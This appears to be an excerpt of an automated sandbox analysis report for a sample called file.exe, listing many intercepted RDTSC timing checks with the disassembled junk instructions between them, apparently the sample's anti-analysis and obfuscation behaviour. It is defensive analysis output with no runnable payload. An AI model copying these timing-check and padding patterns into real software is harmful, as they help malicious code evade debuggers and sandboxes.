Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D35D1 second address: 5D35D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D35D7 second address: 5D35DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DB79A second address: 5DB79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DB79E second address: 5DB7A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DB7A4 second address: 5DB7BD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD000CC0C5Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DB7BD second address: 5DB7C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D9CCE second address: 5D9CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D9CD2 second address: 5D9CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD001095A64h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D9CF0 second address: 5D9CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D9CF6 second address: 5D9CFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DA2DD second address: 5DA2F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD000CC0C56h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FD000CC0C56h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DA2F2 second address: 5DA2F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DA8DA second address: 5DA8E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FD000CC0C56h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DABA9 second address: 5DABAF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E0E7A second address: 5E0E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E0E7E second address: 5E0E82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E250A second address: 5E2514 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD000CC0C56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E2514 second address: 5E251A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E3A71 second address: 5E3A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C68h 0x00000009 jnc 00007FD000CC0C56h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E3A94 second address: 5E3AA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FD001095A5Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E7004 second address: 5E7008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E7185 second address: 5E718A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E7693 second address: 5E76A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD000CC0C56h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push edx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E76A5 second address: 5E76C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD001095A65h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EF1D2 second address: 5EF1D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EF1D6 second address: 5EF1E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EF1E0 second address: 5EF1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD000CC0C56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EF5EF second address: 5EF5F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EF5F5 second address: 5EF601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FD000CC0C56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EF601 second address: 5EF605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EF605 second address: 5EF62A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C68h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EF62A second address: 5EF62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EF62E second address: 5EF64B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C69h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EF927 second address: 5EF92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EF92D second address: 5EF932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EF932 second address: 5EF951 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FD001095A56h 0x00000009 js 00007FD001095A56h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007FD001095A5Bh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EFD95 second address: 5EFDC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnc 00007FD000CC0C5Eh 0x0000000b jmp 00007FD000CC0C69h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EFDC5 second address: 5EFDE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD001095A68h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F0879 second address: 5F087D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F087D second address: 5F0887 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD001095A56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F0F9F second address: 5F0FBB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD000CC0C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jns 00007FD000CC0C56h 0x00000011 jo 00007FD000CC0C56h 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F0FBB second address: 5F0FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F0FC1 second address: 5F0FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F8546 second address: 5F854C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F854C second address: 5F8556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F8556 second address: 5F8583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD001095A5Fh 0x0000000d jmp 00007FD001095A66h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F80FB second address: 5F810C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007FD000CC0C56h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F810C second address: 5F8125 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F8125 second address: 5F813C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD000CC0C62h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F8291 second address: 5F829C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD001095A56h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 604E51 second address: 604E74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FD000CC0C56h 0x00000009 jc 00007FD000CC0C56h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007FD000CC0C60h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 605006 second address: 60500A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60500A second address: 605020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FD000CC0C5Eh 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 608A71 second address: 608A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FD001095A56h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6087A9 second address: 6087B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FD000CC0C56h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6087B5 second address: 6087B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61874A second address: 618750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6185EE second address: 61860C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD001095A70h 0x00000008 jmp 00007FD001095A64h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61860C second address: 61863A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C67h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007FD000CC0C5Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61863A second address: 61863E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619D5F second address: 619D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD000CC0C63h 0x0000000a push edx 0x0000000b jnc 00007FD000CC0C56h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619D80 second address: 619D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61F7B6 second address: 61F7D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD000CC0C56h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD000CC0C5Eh 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61F7D3 second address: 61F7E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FD001095A56h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 625FDB second address: 625FFE instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD000CC0C56h 0x00000008 jp 00007FD000CC0C56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jng 00007FD000CC0C5Eh 0x00000016 jl 00007FD000CC0C56h 0x0000001c pushad 0x0000001d popad 0x0000001e pop edx 0x0000001f pushad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62492B second address: 624930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 624D24 second address: 624D36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ebx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 624D36 second address: 624D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD001095A56h 0x0000000a jmp 00007FD001095A5Ah 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 624FCC second address: 624FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 624FD2 second address: 624FED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD001095A5Eh 0x00000009 popad 0x0000000a jl 00007FD001095A58h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 625125 second address: 625130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD000CC0C56h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 625130 second address: 625137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 625C89 second address: 625C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 625C91 second address: 625CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD001095A60h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62A04F second address: 62A058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 643428 second address: 643438 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jg 00007FD001095A56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6462AF second address: 6462CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C66h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6462CA second address: 6462D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FD001095A56h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6462D6 second address: 6462DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 655D68 second address: 655D7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007FD001095A56h 0x0000000d js 00007FD001095A56h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 655D7D second address: 655DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FD000CC0C65h 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FD000CC0C56h 0x00000015 jmp 00007FD000CC0C63h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53DA2F second address: 53DA39 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD001095A56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6562E5 second address: 6562ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6562ED second address: 6562F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6562F9 second address: 656303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 656303 second address: 65630B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 656479 second address: 656487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FD000CC0C56h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 656487 second address: 65648B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65648B second address: 6564AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 jc 00007FD000CC0C56h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007FD000CC0C56h 0x00000018 jmp 00007FD000CC0C5Bh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6564AE second address: 6564C7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007FD001095A5Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65660E second address: 656614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 656614 second address: 656628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD001095A5Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6568E2 second address: 6568FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C67h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6568FD second address: 65691D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FD001095A66h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65691D second address: 656921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 656921 second address: 65692B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65823E second address: 658242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65AA90 second address: 65AA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65AB10 second address: 65AB15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65AB15 second address: 65AB1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65AD59 second address: 65AD5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65C3AB second address: 65C3C1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD001095A56h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jbe 00007FD001095A56h 0x00000016 rdtsc
